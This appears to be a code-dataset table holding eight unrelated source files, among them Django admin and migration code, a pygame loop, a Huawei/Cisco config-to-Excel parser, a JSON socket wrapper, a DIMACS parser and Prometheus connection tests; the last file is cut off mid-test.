index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
995,000 | d779fe3d8c124940c4cc6b0cfd0738fcbe1763d3 | # Django
from django.contrib import admin
from django.utils.html import format_html
# Model
from .models import Group, Membership
# Utils
import base64
@admin.register(Group)
class GroupAdmin(admin.ModelAdmin):
    """Changelist configuration for Group objects."""

    # Columns shown in the admin list view.
    # NOTE(review): 'pic_render' is not defined here — presumably a rendering
    # helper on the Group model or added elsewhere; confirm.
    list_display = (
        'id',
        'name',
        'slug',
        'description',
        'created',
        'modified',
        'pic_render',
    )
@admin.register(Membership)
class MembershipAdmin(admin.ModelAdmin):
    """Changelist configuration for Membership objects."""

    # Columns shown in the admin list view.
    list_display = ('id', 'user', 'group', 'joined', 'is_admin')
    # Sidebar filters: narrow memberships by group or by user.
    list_filter = ('group', 'user')
|
995,001 | 10fe6790974751a235416caa213494891043ca48 | import sys, pygame
from hero import Hero
from settings import Settings
import gamefunctions as gf
from pygame.sprite import Group
from start_button import Play_button
def run_game():
    """Initialise pygame, create the game objects and run the main loop.

    Blocks forever (the loop has no exit other than whatever
    gf.check_events does on quit events).
    """
    pygame.init()
    game_settings = Settings()
    message = input("Start Game:")
    screen = pygame.display.set_mode(game_settings.screen_size)
    pygame.display.set_caption("Monster Attack")
    # BUG FIX: these two lines were commented out, so check_events /
    # update_screen below raised NameError on the first frame.
    hero = Hero(screen)
    bullets = Group()
    play_button = Play_button(screen, message)
    while True:
        gf.check_events(hero, bullets, game_settings, screen, play_button)
        gf.update_screen(game_settings, screen, hero, bullets, play_button)
        if game_settings.game_active:
            hero.update()
            bullets.update()
            # Iterate a copy: removing from the group while iterating it
            # directly can skip sprites.
            for bullet in bullets.copy():
                if bullet.rect.bottom <= 0:
                    bullets.remove(bullet)
            # Cap the number of live bullets. The original referenced the
            # loop variable after the loop, which crashed (NameError) when
            # the group was empty and removed an arbitrary bullet otherwise.
            while len(bullets) > 15:
                bullets.remove(bullets.sprites()[0])
run_game()
|
995,002 | a3a0df505ca4eb6e3a2958e547ab1aa0a3a90a2f | import re
import ipaddress
import pandas as pd
def is_valid_ipv4_address(address):
    """Return True when *address* parses as an IPv4 address, else False."""
    try:
        ipaddress.IPv4Address(address)
    except ipaddress.AddressValueError:
        return False
    return True
# Load the three device configuration dumps into per-device lists of
# stripped lines (one list entry per config line).
# NOTE(review): paths are hard-coded Windows paths; the script only runs
# on the author's machine as-is.
fileDataHuawei=[]
with open("D:/install/Programming/Python/disp_cur_vvo.txt") as file:
    # fileData = file.readlines()
    for data in file:
        fileDataHuawei.append(data.strip())
# print (fileDataHuawei)
# print (len(fileDataHuawei))
fileDataCisco=[]
with open("D:/install/Programming/Python/show_run_khb.txt") as file:
    # fileData = file.readlines()
    for data in file:
        fileDataCisco.append(data.strip())
# print (fileDataCisco)
# print (len(fileDataCisco))
fileDataHuaweiSwitch=[]
with open("D:/install/Programming/Python/disp_cur_switch.txt") as file:
    # fileData = file.readlines()
    for data in file:
        fileDataHuaweiSwitch.append(data.strip())
# print (fileDataHuaweiSwitch)
# print (len(fileDataHuaweiSwitch))
def int_list_cisco_router(fileData):
    """Parse a Cisco-style running-config (list of stripped lines) into a
    dict of per-interface attribute lists.

    Every key of the returned dict maps to a list with one entry per
    "interface ..." stanza found; an entry is False when the corresponding
    attribute is absent for that interface.

    :param fileData: config lines, already stripped of whitespace
    :return: dict of parallel attribute lists keyed by column name
    """
    # Config stanzas are delimited by lines beginning with "!".
    exclamList = [i for i, item in enumerate(fileData) if item.find("!") == 0]
    intListMain = []
    intDict = {key: [] for key in ["intNum",
                                   "intSub",
                                   "intStatus",
                                   "intDesc",
                                   "intType",
                                   "intL3IpAddress",
                                   "intVRF",
                                   "intSpeed",
                                   "intL2vcIpPeer",
                                   "intL2vcId",
                                   "intNetwork",
                                   "intRouteStaticNetwork",
                                   "intRouteHexthop"]}
    routeDict = {key: [] for key in ["routeVRF",
                                     "routeStaticNetwork",
                                     "routeStaticNextHop"]}
    # BUG FIX: a missing comma previously fused "bgpRouteLimit," and
    # "bgpOtherParam" into a single key "bgpRouteLimit,bgpOtherParam";
    # also fixed the "bgprIpv4Family" typo. bgpDict is not used further yet.
    bgpDict = {key: [] for key in ["bgpIpv4Family",
                                   "bgpVRF",
                                   "bgpPeerIp",
                                   "bgpPeerAs",
                                   "bgpRouteLimit",
                                   "bgpOtherParam"]}
    for i in range(len(exclamList) - 1):
        for k in fileData[exclamList[i] + 1:exclamList[i + 1]]:
            # Interface stanza: start a new row (all attributes default False).
            if (k.find("interface ") == 0):
                for key in intDict:
                    intDict[key].append(False)
                temp1 = re.split(' ', k)
                if ("." in temp1[1]):
                    # sub-interface: remember the part after the dot
                    temp1.append(temp1[1].split(".")[1])
                else:
                    temp1.append("")
                intListMain.append(temp1[1])
                intDict["intNum"][len(intDict["intNum"]) - 1] = temp1[1].split(".")[0]
                if len(temp1) > 3:
                    intDict["intSub"][len(intDict["intSub"]) - 1] = temp1[3]
                else:
                    intDict["intSub"][len(intDict["intSub"]) - 1] = temp1[2]
                # Scan the rest of this stanza for per-interface attributes.
                # NOTE(review): fileData.index(k) anchors on the FIRST identical
                # line, so duplicated interface lines would mis-anchor the scan.
                for k in fileData[fileData.index(k):exclamList[i + 1]]:
                    if "description" in k:
                        temp2 = k.split(' ', 1)
                        intDict["intDesc"][len(intDict["intDesc"]) - 1] = temp2[1]
                    if "ipv4 address" in k:
                        if "secondary" not in k:
                            # primary address: store "a.b.c.d/len" and its network
                            temp3 = k.split()
                            intDict["intType"][len(intDict["intType"]) - 1] = "L3"
                            intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen
                            intDict["intNetwork"][len(intDict["intNetwork"]) - 1] = ipaddress.IPv4Interface((temp3[2], temp3[3])).network
                        else:
                            # secondary address: promote the entry to a list
                            temp3 = k.split()
                            intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = [intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1]]
                            intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1].append(ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen)
                    if "shutdown" in k and "undo shutdown" not in k:
                        intDict["intStatus"][len(intDict["intStatus"]) - 1] = "shutdown"
                    if "vrf" in k:
                        temp4 = k.split()
                        intDict["intVRF"][len(intDict["intVRF"]) - 1] = temp4[1]
                    if "service-policy" in k:
                        temp5 = k.split()
                        intDict["intSpeed"][len(intDict["intSpeed"]) - 1] = temp5[2]
                    if "mpls l2vc" in k:
                        temp6 = k.split()
                        intDict["intType"][len(intDict["intType"]) - 1] = "xconnect"
                        intDict["intL2vcIpPeer"][len(intDict["intL2vcIpPeer"]) - 1] = temp6[2]
                        intDict["intL2vcId"][len(intDict["intL2vcId"]) - 1] = temp6[3]
            # Static routes (blackhole/NULL routes are skipped).
            if k.find("ip route-static") == 0 and "NULL" not in k:
                for key in routeDict:
                    routeDict[key].append(False)
                temp11 = k.split()
                if "vpn-instance" in k:
                    routeDict["routeVRF"][len(routeDict["routeVRF"]) - 1] = temp11[3]
                    routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"]) - 1] = ipaddress.IPv4Interface(
                        (temp11[4], temp11[5])).with_prefixlen
                    if is_valid_ipv4_address(temp11[6]):
                        routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
                            temp11[6]).compressed
                    else:
                        # next hop preceded by an egress-interface token
                        routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
                            temp11[7]).compressed
                else:
                    routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"]) - 1] = ipaddress.IPv4Interface(
                        (temp11[2], temp11[3])).with_prefixlen
                    routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
                        temp11[4]).compressed
            if k.find("bgp") == 0:
                # BGP parsing not implemented yet; just keep list lengths in sync.
                for key in bgpDict:
                    bgpDict[key].append(False)
    # Attach each static route to the L3 interface whose subnet contains its
    # next hop (VRFs must match); later matches overwrite earlier ones.
    for i in range(len(routeDict["routeStaticNextHop"])):
        for j in range(len(intDict["intNetwork"])):
            if intDict["intType"][j] == "L3" and ipaddress.IPv4Address(routeDict["routeStaticNextHop"][i]) in ipaddress.IPv4Network(intDict["intNetwork"][j]) \
                    and routeDict["routeVRF"][i] == intDict["intVRF"][j]:
                intDict["intRouteStaticNetwork"][j] = routeDict["routeStaticNetwork"][i]
                intDict["intRouteHexthop"][j] = routeDict["routeStaticNextHop"][i]
    return intDict
def int_list_huawei_router(fileData):
    """Parse a Huawei router running-config (list of stripped lines) into a
    dict of per-interface attribute lists.

    Like int_list_cisco_router, but stanzas are delimited by "#" lines and
    an interface may carry several "ip address" lines ("sub" = secondary),
    so intL3IpAddress / intNetwork entries are LISTS of prefix strings.

    :param fileData: config lines, already stripped of whitespace
    :return: dict of parallel attribute lists keyed by column name
    """
    # Huawei config stanzas are delimited by "#" lines.
    sharpList = [i for i, item in enumerate(fileData) if item.find("#") == 0]
    intListMain = []
    intDict = {key: [] for key in ["intNum",
                                   "intSub",
                                   "intStatus",
                                   "intDesc",
                                   "intType",
                                   "intL3IpAddress",
                                   "intVRF",
                                   "intSpeed",
                                   "intL2vcIpPeer",
                                   "intL2vcId",
                                   "intNetwork",
                                   "intRouteStaticNetwork",
                                   "intRouteHexthop"]}
    routeDict = {key: [] for key in ["routeVRF",
                                     "routeStaticNetwork",
                                     "routeStaticNextHop"]}
    # BUG FIX: a missing comma previously fused "bgpRouteLimit," and
    # "bgpOtherParam" into one key; "bgprIpv4Family" typo fixed too.
    bgpDict = {key: [] for key in ["bgpIpv4Family",
                                   "bgpVRF",
                                   "bgpPeerIp",
                                   "bgpPeerAs",
                                   "bgpRouteLimit",
                                   "bgpOtherParam"]}
    for i in range(len(sharpList) - 1):
        for k in fileData[sharpList[i] + 1:sharpList[i + 1]]:
            # Interface stanza: start a new row (all attributes default False).
            if (k.find("interface ") == 0):
                for key in intDict:
                    intDict[key].append(False)
                temp1 = re.split(' ', k)
                if ("." in temp1[1]):
                    # sub-interface: remember the part after the dot
                    temp1.append(temp1[1].split(".")[1])
                else:
                    temp1.append("")
                intListMain.append(temp1[1])
                intDict["intNum"][len(intDict["intNum"]) - 1] = temp1[1].split(".")[0]
                intDict["intSub"][len(intDict["intSub"]) - 1] = temp1[2]
                # Scan the rest of this stanza for per-interface attributes.
                # NOTE(review): fileData.index(k) anchors on the FIRST identical
                # line, so duplicated interface lines would mis-anchor the scan.
                for k in fileData[fileData.index(k):sharpList[i + 1]]:
                    if "description" in k:
                        temp2 = k.split(' ', 1)
                        intDict["intDesc"][len(intDict["intDesc"]) - 1] = temp2[1]
                    if "ip address" in k and not "unnumbered" in k:
                        if "sub" not in k:
                            # primary address: start the per-interface lists
                            temp3 = k.split()
                            intDict["intType"][len(intDict["intType"]) - 1] = "L3"
                            intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1] = [ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen]
                            intDict["intNetwork"][len(intDict["intNetwork"]) - 1] = [ipaddress.IPv4Interface((temp3[2], temp3[3])).network.with_prefixlen]
                        else:
                            # secondary ("sub") address: extend the lists
                            temp3 = k.split()
                            intDict["intL3IpAddress"][len(intDict["intL3IpAddress"]) - 1].append(ipaddress.IPv4Interface((temp3[2], temp3[3])).with_prefixlen)
                            intDict["intNetwork"][len(intDict["intNetwork"]) - 1].append(ipaddress.IPv4Interface((temp3[2], temp3[3])).network.with_prefixlen)
                    if "shutdown" in k and "undo shutdown" not in k:
                        intDict["intStatus"][len(intDict["intStatus"]) - 1] = "shutdown"
                    if "ip binding vpn-instance" in k:
                        temp4 = k.split()
                        intDict["intVRF"][len(intDict["intVRF"]) - 1] = temp4[3]
                    if "qos car cir" in k:
                        temp5 = k.split()
                        intDict["intSpeed"][len(intDict["intSpeed"]) - 1] = temp5[3]
                    if "mpls l2vc" in k:
                        temp6 = k.split()
                        intDict["intType"][len(intDict["intType"]) - 1] = "xconnect"
                        intDict["intL2vcIpPeer"][len(intDict["intL2vcIpPeer"]) - 1] = temp6[2]
                        intDict["intL2vcId"][len(intDict["intL2vcId"]) - 1] = temp6[3]
                    if "l2 binding vsi" in k:
                        # (dead local `temp7 = k.split()` removed)
                        intDict["intType"][len(intDict["intType"]) - 1] = "vsi"
            # Static routes (blackhole/NULL routes are skipped).
            if k.find("ip route-static") == 0 and "NULL" not in k:
                for key in routeDict:
                    routeDict[key].append(False)
                temp11 = k.split()
                if "vpn-instance" in k:
                    routeDict["routeVRF"][len(routeDict["routeVRF"]) - 1] = temp11[3]
                    routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"]) - 1] = ipaddress.IPv4Interface(
                        (temp11[4], temp11[5])).with_prefixlen
                    if is_valid_ipv4_address(temp11[6]):
                        routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
                            temp11[6]).compressed
                    else:
                        # next hop preceded by an egress-interface token
                        routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
                            temp11[7]).compressed
                else:
                    routeDict["routeStaticNetwork"][len(routeDict["routeStaticNetwork"]) - 1] = ipaddress.IPv4Interface(
                        (temp11[2], temp11[3])).with_prefixlen
                    routeDict["routeStaticNextHop"][len(routeDict["routeStaticNextHop"]) - 1] = ipaddress.IPv4Address(
                        temp11[4]).compressed
            if k.find("bgp") == 0:
                # BGP parsing not implemented yet; just keep list lengths in sync.
                for key in bgpDict:
                    bgpDict[key].append(False)
    # Attach each static route to every L3 interface whose subnet contains
    # the route's next hop (VRFs must match); matches accumulate as lists.
    for i in range(len(routeDict["routeStaticNextHop"])):
        for j in range(len(intDict["intNetwork"])):
            if intDict["intNetwork"][j] != False:
                for l in range(len(intDict["intNetwork"][j])):
                    if intDict["intType"][j] == "L3" and ipaddress.IPv4Address(routeDict["routeStaticNextHop"][i]) in ipaddress.IPv4Network(intDict["intNetwork"][j][l]) \
                            and routeDict["routeVRF"][i] == intDict["intVRF"][j]:
                        if intDict["intRouteStaticNetwork"][j] == False:
                            intDict["intRouteStaticNetwork"][j] = [routeDict["routeStaticNetwork"][i]]
                            intDict["intRouteHexthop"][j] = [routeDict["routeStaticNextHop"][i]]
                        else:
                            intDict["intRouteStaticNetwork"][j].append(routeDict["routeStaticNetwork"][i])
                            intDict["intRouteHexthop"][j].append(routeDict["routeStaticNextHop"][i])
    return intDict
def vlan_list_huawei_switch(fileData):
    """Parse a Huawei switch running-config (list of stripped lines) into a
    dict of per-VLAN lists: VLAN number, name, and the interfaces (plus
    their port types) carrying that VLAN.

    :param fileData: config lines, already stripped of whitespace
    :return: vlanDict with parallel lists keyed by
             vlanNum / vlanName / vlanInInt / vlanIntType
    """
    # Huawei config stanzas are delimited by "#" lines.
    sharpList = [i for i, item in enumerate(fileData) if item.find("#")==0]
    # print (sharpList)
    intListMain = []
    # intDict = {"intNum": [], "intSub":[] , "intDesc":[]}
    vlanDict = {key: [] for key in ["vlanNum",
                                    "vlanName",
                                    "vlanInInt",
                                    "vlanIntType"]}
    intDict = {key: [] for key in ["intNum",
                                   "intDesc",
                                   "intPortType",
                                   "intVlanInclude"]}
    for i in range(len(sharpList)-1):
        for k in fileData[sharpList[i] + 1:sharpList[i+1]]:
            # Interface stanza: collect port type and VLAN membership.
            if k.find("interface ")==0:
                # print ("range is:", fileData.index(k), sharpList[i+1])
                for key in intDict:
                    intDict[key].append([])
                temp1 = k.split()
                intDict["intNum"][len(intDict["intNum"]) - 1] = temp1[1]
                intDict["intVlanInclude"][len(intDict["intVlanInclude"]) - 1] = []
                # NOTE(review): fileData.index(k) anchors on the FIRST identical
                # line; duplicated interface lines would mis-anchor this scan.
                for k in fileData[fileData.index(k):sharpList[i + 1]]:
                    if "description" in k:
                        temp2 = k.split(' ', 1)
                        intDict["intDesc"][len(intDict["intDesc"])-1]=temp2[1]
                    if "port link-type" in k:
                        temp3 = k.split()
                        intDict["intPortType"][len(intDict["intPortType"])-1]=temp3[2]
                    # Trunk ports: expand "x to y" ranges into explicit VLAN ids.
                    if "port trunk allow-pass vlan" in k and "undo" not in k:
                        temp4 = k.split()
                        del temp4[:4]
                        # NOTE(review): this loop shadows the outer loop variable
                        # `i` and mutates temp4 while iterating it — it happens to
                        # work for a single "to" range, but is fragile if a line
                        # contains several "x to y" ranges; verify on real configs.
                        for i in temp4:
                            if i == "to":
                                # interior of the range (endpoints are already in temp4)
                                temp5 = list(range(int(temp4 [temp4.index(i)-1])+1, int(temp4 [temp4.index(i)+1])))
                                # print (temp5, "Len:", len(temp5))
                                if len(temp5)!=0:
                                    for j in temp5:
                                        temp4.append(j)
                                # drop the "to" token itself
                                del temp4 [temp4.index(i)]
                        temp4 = [int(item) for item in temp4]
                        temp4.sort()
                        for item in temp4:
                            intDict["intVlanInclude"][len(intDict["intVlanInclude"]) - 1].append(item)
                    # Access ports: a single untagged VLAN.
                    if "port default vlan" in k:
                        temp6 = k.split()
                        del temp6[:3]
                        intDict["intVlanInclude"][len(intDict["intVlanInclude"]) - 1].append(int(temp6[0]))
            # VLAN definition stanza ("vlan <id>", but not "vlan batch ..." lists).
            if k.find("vlan") ==0 and "vlan batch" not in k:
                for key in vlanDict:
                    vlanDict[key].append([])
                temp7 = k.split()
                vlanDict["vlanNum"][len(vlanDict["vlanNum"]) - 1] = int(temp7[1])
                # The VLAN's name/description, if present, is on the next line.
                if fileData[fileData.index(k)+1].find("description")==0 or fileData[fileData.index(k)+1].find("name")==0:
                    temp8 = fileData[fileData.index(k)+1].split(' ', 1)
                    vlanDict["vlanName"][len(vlanDict["vlanName"]) - 1] = temp8[1]
    # Cross-reference: for every defined VLAN, record each interface (and its
    # port type) whose membership list contains that VLAN id.
    for data1 in vlanDict["vlanNum"]:
        for num1 in range(len(intDict["intVlanInclude"])):
            for num2 in range(len(intDict["intVlanInclude"][num1])):
                if data1 ==intDict["intVlanInclude"][num1][num2]:
                    vlanDict["vlanInInt"][vlanDict["vlanNum"].index(data1)].append(intDict["intNum"][num1])
                    vlanDict["vlanIntType"][vlanDict["vlanNum"].index(data1)].append(intDict["intPortType"][num1])
    return vlanDict
# Build the per-device dicts (inputs are the file contents loaded at the top
# of the module) and join router sub-interfaces with switch VLANs.
dictOfRouter = int_list_huawei_router(fileDataHuawei)
dictOfRouterCisco = int_list_cisco_router(fileDataCisco)
dictOfSwitch = vlan_list_huawei_switch(fileDataHuaweiSwitch)
dictOfAll={}
# dictOfAll gets one column per router-interface key plus one per VLAN key.
dictOfAll = {key: [] for key in (list(dictOfRouter.keys())+list(dictOfSwitch.keys()))}
# Join condition: router sub-interface number equals the switch VLAN id.
# NOTE(review): the uplink name "GigabitEthernet3/0/1" is hard-coded — only
# sub-interfaces of that one port are matched; confirm that is intended.
for num1 in range(len(dictOfRouter["intNum"])):
    for num2 in range(len(dictOfSwitch["vlanNum"])):
        if dictOfRouter["intNum"][num1] == "GigabitEthernet3/0/1" and dictOfRouter["intSub"][num1]==str(dictOfSwitch["vlanNum"][num2]):
            dictOfAll["intNum"].append(dictOfRouter["intNum"][num1])
            dictOfAll["intSub"].append(dictOfRouter["intSub"][num1])
            dictOfAll["intStatus"].append(dictOfRouter["intStatus"][num1])
            dictOfAll["intDesc"].append(dictOfRouter["intDesc"][num1])
            dictOfAll["intType"].append(dictOfRouter["intType"][num1])
            dictOfAll["intL3IpAddress"].append(dictOfRouter["intL3IpAddress"][num1])
            dictOfAll["intVRF"].append(dictOfRouter["intVRF"][num1])
            dictOfAll["intSpeed"].append(dictOfRouter["intSpeed"][num1])
            dictOfAll["intL2vcIpPeer"].append(dictOfRouter["intL2vcIpPeer"][num1])
            dictOfAll["intL2vcId"].append(dictOfRouter["intL2vcId"][num1])
            dictOfAll["intNetwork"].append(dictOfRouter["intNetwork"][num1])
            dictOfAll["intRouteStaticNetwork"].append(dictOfRouter["intRouteStaticNetwork"][num1])
            dictOfAll["intRouteHexthop"].append(dictOfRouter["intRouteHexthop"][num1])
            dictOfAll["vlanNum"].append(dictOfSwitch["vlanNum"][num2])
            dictOfAll["vlanName"].append(dictOfSwitch["vlanName"][num2])
            dictOfAll["vlanInInt"].append(dictOfSwitch["vlanInInt"][num2])
            dictOfAll["vlanIntType"].append(dictOfSwitch["vlanIntType"][num2])
# Export the Cisco interface table to Excel.
# NOTE(review): df3.loc[190] assumes at least 191 parsed interfaces and
# looks like leftover debugging output — confirm before keeping.
df3 = pd.DataFrame(dictOfRouterCisco)
print (df3)
print (df3.loc[190])
df3.to_excel(r'test_cisco.xlsx', index=False, header=True)
|
995,003 | 56f0a4b12c1cfa0ecfb1486afb906a23ff819e3d | # Generated by Django 2.2.6 on 2019-11-10 12:48
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: drop ``Item.slug`` and change
    ``Item.image`` to a plain ``FileField`` with no upload subdirectory."""

    # Must run after the previous shop migration.
    dependencies = [
        ('shop', '0004_auto_20191105_0652'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='item',
            name='slug',
        ),
        migrations.AlterField(
            model_name='item',
            name='image',
            field=models.FileField(upload_to=''),
        ),
    ]
|
995,004 | a589c5940bcc9bc0d178dc83f4cf62f0f4fa9053 | print("Helllllllloooooo World!") #Print greeting
# Ask for the user's name, greet them with it capitalized, and report
# (and joke about) its length.
print("What is your name?")
my_name = input()
print("Nice to meet you, " + my_name.capitalize())
print('Your name has ' + str(len(my_name)) + ' letters in it.')
# Names longer than five letters get the "heavy" remark, shorter ones "light".
if len(my_name) > 5:
    print("Does your name ever feel heavy?")
else:
    print("Your name is so light it could float away.")
|
995,005 | a4aabcd655618f29c4bd27ba402027e3bbfc2c21 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import json
from Common.socket.Socket import *
class JsonSocket(Socket):
    """Socket subclass that exchanges JSON documents encoded as UTF-8."""

    def __init__(self, conn=None, desc="", logger=get_stdout_logger()):
        super().__init__(conn, desc, logger)

    def __del__(self):
        super().__del__()

    @staticmethod
    def is_json(data):
        """Return True when *data* parses as a JSON document."""
        try:
            json.loads(data)
        except ValueError:
            return False
        return True

    def send(self, json_dat):
        """Serialize *json_dat* to JSON and send it; False when it cannot
        be serialized."""
        try:
            payload = json.dumps(json_dat)
        except Exception as e:
            write_exception_log(self.logger, e, msg="send")
            return False
        # Encode to UTF-8 bytes before handing off to the raw socket.
        return super().send(payload.encode('utf-8'))

    def recv(self):
        """Receive one message and return it parsed as JSON, or None on
        any failure (nothing received, empty payload, decode/parse error)."""
        raw = super().recv()
        if raw is None:
            return None
        try:
            text = raw.decode('utf-8')
            if len(text) == 0:
                self.logger.error("recv data fail")
                return None
            return json.loads(text)
        except Exception as e:
            write_exception_log(self.logger, e, msg="recv")
            return None
def json_send_and_recv(ip, port, request_dict, recv_=True,
                       show_send_recv_dat_=False, desc="", logger=get_stdout_logger()):
    """One-shot helper: open a JsonSocket, send *request_dict* to ip:port
    (optionally waiting for a reply), tear the socket down, and return the
    result of send_and_recv."""
    json_sock = JsonSocket(desc=desc, logger=logger)
    result = json_sock.send_and_recv(ip, port, request_dict, recv_, show_send_recv_dat_)
    json_sock.uninitialize()
    del json_sock
    return result
|
995,006 | 960599979ac084fc155eb73e808de12a6bc5018f | """
Parse the input formula in dimacs format
"""
class Parser:
    """Parser for propositional formulas in DIMACS CNF format."""

    @staticmethod  # BUG FIX: was an instance method but is called on the class
    def parse_dimacs(input_file):
        """Parse *input_file* (DIMACS CNF) into a list of integer clauses.

        :param input_file: path to a DIMACS file
        :return: (formula, num_literals) — formula is a list of clauses
                 (each a list of signed ints), num_literals comes from the
                 "p cnf <vars> <clauses>" header (0 if no header is present).
        """
        formula = []
        num_literals = 0  # fallback: previously unbound when 'p' line missing
        with open(input_file) as file:
            for line in file:
                if line.startswith('c'):  # comment line
                    continue
                if line.startswith('p'):  # header: "p cnf <vars> <clauses>"
                    num_literals = int(line.split()[2])
                    continue
                # line[:-2] drops the trailing "0\n" clause terminator
                # (NOTE: assumes every clause line ends exactly that way)
                clause = [int(x) for x in line[:-2].split()]
                formula.append(clause)
        # no explicit file.close(): the with-block closes the file
        return formula, num_literals
|
995,007 | 957a43402464ecdd5976ac9dcab0722af93784de | # -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2023 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the prometheus connection module."""
import asyncio
from typing import cast
from unittest.mock import MagicMock, Mock
import pytest
from aea.common import Address
from aea.configurations.base import ConnectionConfig, PublicId
from aea.exceptions import AEAEnforceError
from aea.identity.base import Identity
from aea.mail.base import Envelope, Message
from aea.protocols.dialogue.base import Dialogue as BaseDialogue
from packages.fetchai.connections.prometheus.connection import (
ConnectionStates,
PrometheusConnection,
)
from packages.fetchai.protocols.prometheus.dialogues import PrometheusDialogue
from packages.fetchai.protocols.prometheus.dialogues import (
PrometheusDialogues as BasePrometheusDialogues,
)
from packages.fetchai.protocols.prometheus.message import PrometheusMessage
class PrometheusDialogues(BasePrometheusDialogues):
    """The dialogues class keeps track of all prometheus dialogues."""

    def __init__(self, self_address: Address, **kwargs) -> None:
        """
        Initialize dialogues.

        :param self_address: the address used as this agent's end of each dialogue
        :param kwargs: accepted for interface compatibility (not forwarded)
        :return: None
        """

        def role_from_first_message(  # pylint: disable=unused-argument
            message: Message, receiver_address: Address
        ) -> BaseDialogue.Role:
            """Infer the role of the agent from an incoming/outgoing first message

            :param message: an incoming/outgoing first message
            :param receiver_address: the address of the receiving agent
            :return: The role of the agent
            """
            # Every dialogue participant is treated as an AGENT here.
            return PrometheusDialogue.Role.AGENT

        BasePrometheusDialogues.__init__(
            self,
            self_address=self_address,
            role_from_first_message=role_from_first_message,
        )
class TestPrometheusConnection:
    """Test the packages/connection/prometheus/connection.py."""

    def setup(self):
        """Initialise the class: build an identity and a PrometheusConnection
        listening on port 9090, plus the dialogues used to create messages."""
        self.metrics = {}
        configuration = ConnectionConfig(
            connection_id=PrometheusConnection.connection_id,
            port=9090,
        )
        self.some_skill = "some/skill:0.1.0"
        self.agent_address = "my_address"
        self.agent_public_key = "my_public_key"
        self.protocol_specification_id = PublicId.from_str("fetchai/prometheus:1.1.7")
        identity = Identity(
            "name", address=self.agent_address, public_key=self.agent_public_key
        )
        self.prometheus_con = PrometheusConnection(
            identity=identity, configuration=configuration, data_dir=MagicMock()
        )
        self.loop = asyncio.get_event_loop()
        self.prometheus_address = str(PrometheusConnection.connection_id)
        self.dialogues = PrometheusDialogues(self.some_skill)

    async def send_add_metric(self, title: str, metric_type: str) -> None:
        """Send an add_metric message.

        :param title: name of the metric to create
        :param metric_type: prometheus metric type name (e.g. "Gauge")
        """
        msg, sending_dialogue = self.dialogues.create(
            counterparty=self.prometheus_address,
            performative=PrometheusMessage.Performative.ADD_METRIC,
            title=title,
            type=metric_type,
            description="a gauge",
            labels={},
        )
        assert sending_dialogue is not None
        envelope = Envelope(
            to=msg.to,
            sender=msg.sender,
            message=msg,
        )
        await self.prometheus_con.send(envelope)

    async def send_update_metric(self, title: str, update_func: str) -> None:
        """Send an update_metric message.

        :param title: name of the metric to update
        :param update_func: metric method to invoke (e.g. "inc", "set")
        """
        msg, sending_dialogue = self.dialogues.create(
            counterparty=self.prometheus_address,
            performative=PrometheusMessage.Performative.UPDATE_METRIC,
            title=title,
            callable=update_func,
            value=1.0,
            labels={},
        )
        assert sending_dialogue is not None
        assert sending_dialogue.last_message is not None
        envelope = Envelope(
            to=msg.to,
            sender=msg.sender,
            message=msg,
        )
        await self.prometheus_con.send(envelope)

    def teardown(self):
        """Clean up after tests."""
        self.loop.run_until_complete(self.prometheus_con.disconnect())

    @pytest.mark.asyncio
    async def test_connection(self):
        """Test connect, then exercise add_metric / update_metric round-trips
        and the error paths of the connection channel."""
        assert (
            self.prometheus_con.state == ConnectionStates.disconnected
        ), "should not be connected yet"
        await self.prometheus_con.connect()
        assert (
            self.prometheus_con.state == ConnectionStates.connected
        ), "should be connected"
        # test add metric (correct)
        await self.send_add_metric("some_metric", "Gauge")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 200
        assert msg.message == "New Gauge successfully added: some_metric."
        # test add metric (already exists)
        await self.send_add_metric("some_metric", "Gauge")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 409
        assert msg.message == "Metric already exists."
        # test add metric (wrong type)
        await self.send_add_metric("cool_metric", "CoolBar")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 404
        assert msg.message == "CoolBar is not a recognized prometheus metric."
        # test update metric (inc: correct)
        await self.send_update_metric("some_metric", "inc")
        envelope = await self.prometheus_con.receive()
        msg = cast(PrometheusMessage, envelope.message)
        assert msg.performative == PrometheusMessage.Performative.RESPONSE
        assert msg.code == 200
